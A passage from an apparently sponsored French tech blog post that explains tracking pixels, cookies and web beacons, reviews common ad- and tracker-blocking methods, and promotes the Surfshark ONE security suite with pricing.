Ce dispositif est largement plébiscité, car il fonctionne en temps réel et, contrairement aux cookies, il ne s’appuie pas sur votre appareil pour stocker des informations. Il transmet directement à distance, ce qui le rend plus difficile à bloquer ou à effacer.

Les cookies : les compagnons de votre navigateur qui vous aiment un peu trop

À la différence des pixels, les cookies sont de petits fichiers texte que les sites déposent sur votre machine à chaque visite. Leur rôle premier est d’améliorer votre expérience en conservant vos préférences : langue choisie, paniers d’achats, sessions ouvertes, etc. Plutôt pratiques, donc. Sauf que dans le grand bazar du marketing en ligne, ces fichiers deviennent des espions collaboratifs. Ils enregistrent vos habitudes et servent à partager ces données entre dizaines de régies publicitaires, pour mieux vous bombarder. Vous pensez que ce site est le seul à vous traquer ? En réalité, ces cookies multiplient les relais invisibles derrière les boutons “J’aime” ou les vidéos intégrées.

Mais contrairement aux pixels, vous pouvez gérer les cookies plus facilement via votre navigateur : les bloquer, les effacer, ou les contrôler site par site.

Web beacons : le fantôme de l’email et des sites web

Plus proche du tracking pixel, le web beacon est une image ultra petite, souvent un “GIF 1×1 pixel”, caché dans un email ou sur un site. Comme le pixel, il se charge automatiquement et envoie des infos au serveur. Les conséquences ? Le serveur sait si vous avez ouvert un email, quand, depuis quel appareil, et où vous vous trouviez. Son usage dans l’email marketing est stratégique : il permet aux expéditeurs de savoir qui ouvre leur message, qui clique, et à quel moment. Parfois, il ouvre même la porte à un ciblage encore plus précis, car il détecte votre localisation via IP et recoupe les données.

Bon vous allez me dire … c’est bien beau tout ça tonton Korben, mais pourquoi faire la différence entre ces technologies ?

Parce que pour reprendre le contrôle, il faut comprendre ce qu’il faut attaquer. Bloquer un pixel ne bloque pas automatiquement un cookie, et vice versa. Certains bloqueurs de pubs repoussent avec succès les cookies tiers, mais laissent passer les pixels diffusés par des scripts HTML, et les web beacons, eux, se glissent souvent dans vos mails, bien loin du navigateur. Cette diversité rend le pistage terriblement robuste et difficile à éliminer par une simple action ponctuelle.

Les méthodes classiques

1. Les extensions navigateur : Adblock Plus, uBlock Origin, Ghostery… ces plugins restent la première étape, pour filtrer les requêtes publicitaires et couper les scripts intrusifs avant qu’ils ne chargent. L’avantage c’est qu’elles sont faciles à installer et gratuites. Le souci est qu’elles sont parfois incompatibles avec certains sites, que les pop-ups sont parfois non filtrés, et qu’elles peuvent ralentir la navigation.

2. Les réglages navigateurs : les navigateurs modernes (Chrome, Firefox, Edge) offrent des options anti-pistage et anti pop-up native, mais leur efficacité reste limitée face à des scripts plus complexes ou aux pubs via réseaux sociaux. Brave, Epic Privacy Browser, LibreWolf, etc. sont d’autres options possibles.

3. VPN + adblock : bloquer via un VPN classique peut aider, mais la vraie force est un service combiné. Les VPN classiques cachent votre IP et chiffrent le trafic, mais ne coupent pas forcément le dataset publicitaire ou les pop-ups. L’intégration d’un bloqueur de contenu dans le VPN représente la différence.

Surfshark ONE : le pack complet pour le blocage intelligent

Surfshark ONE n’est pas qu’un VPN. C’est une suite de cybersécurité (VPN + antivirus + moteur de recherche + alerte de fuite de données + Alternative ID) pensée pour éliminer pubs, trackers, pop-ups, et surtout, vous protéger contre les arnaques mail, le tout géré depuis une interface unique et claire.

• CleanWeb , le bloqueur intelligent que j’ai déjà présenté, agit à la racine des pages web : il bloque non seulement les pubs visibles, mais aussi les scripts, pixels, malwares et traqueurs qui se glissent dans le code des pages. Sur smartphone ou PC, l’effet est quasi immédiat : baisse du nombre de pubs et déplacements plus rapides, sans « casser » les sites.
• La nouveauté fin 2025 : Email Scam Checker. Ce scanner intelligent analyse vos mails entrants pour détecter les tentatives d’arnaque, phishing et spams avancés. Au lieu d’attendre de cliquer sur un lien suspect, vous êtes alertés en temps réel, ce qui réduit considérablement les risques d’infection ou de vol d’identité.
• Interface intégrée : plus besoin de jongler entre extensions ou apps manuelles, tout est dans le même client Surfshark ONE, que ce soit sur Android, iOS, Windows ou macOS. Un contrôle centralisé, un paramétrage simple et une expérience utilisateur fluide.
• Protection multi-appareils : vos smartphones, PC, tablettes sont protégés à la fois contre les pubs, les pop-ups, les traqueurs et désormais les mails scams, sans configuration complexe à chaque fois.

Avant, bloquer totalement la pub en ligne était chronophage et jamais parfait : extensions instables, failles, contournements fréquents. La multiplication des canaux (mail, mobile, desktop, jeux en ligne…) rendait la tâche impossible sans outils multiples.

Avec Surfshark ONE, la liaison entre VPN, bloqueur, scanner mail et gestion centralisée offre un rempart cohérent, le blocage ne se fait pas par à-coups, mais en continu, intelligement, ajusté à toutes vos activités numériques. Ce qui permet enfin de retrouver une navigation fluide, sécurisée et sans intrusion agressive, pour toute la famille ou l’entreprise.

Les pubs intempestives ne sont pas qu’une nuisance : elles sont la porte d’entrée des cybermenaces et une attaque frontale à la vie privée. Surfshark ONE propose aujourd’hui la réponse la plus complète, en combinant VPN, bloqueur intelligent et le tout nouveau scanner anti-arnaque mail. Si vous souhaitez retrouver le contrôle de votre surf, éviter ralentissements et failles de sécurité tout en profitant d’une vraie protection 360°, ce service est pour vous.

Et la bonne nouvelle, vous pouvez tester tout cela sans prise de tête, sur tous vos appareils, en un clic … et à tout petit prix puisque la suite est proposée pour 20 centimes de plus par mois par rapport au VPN seul. L’abonnement ONE classique est à 71€ TTC pour 27 mois (soit 2.63€/mois), quant à ONE+ (qui intègre en plus le service Incogni) il est dispo pour 5€/mois. De quoi commencer 2026 au taquet !

Profitez de Surfshark One au meilleur prix !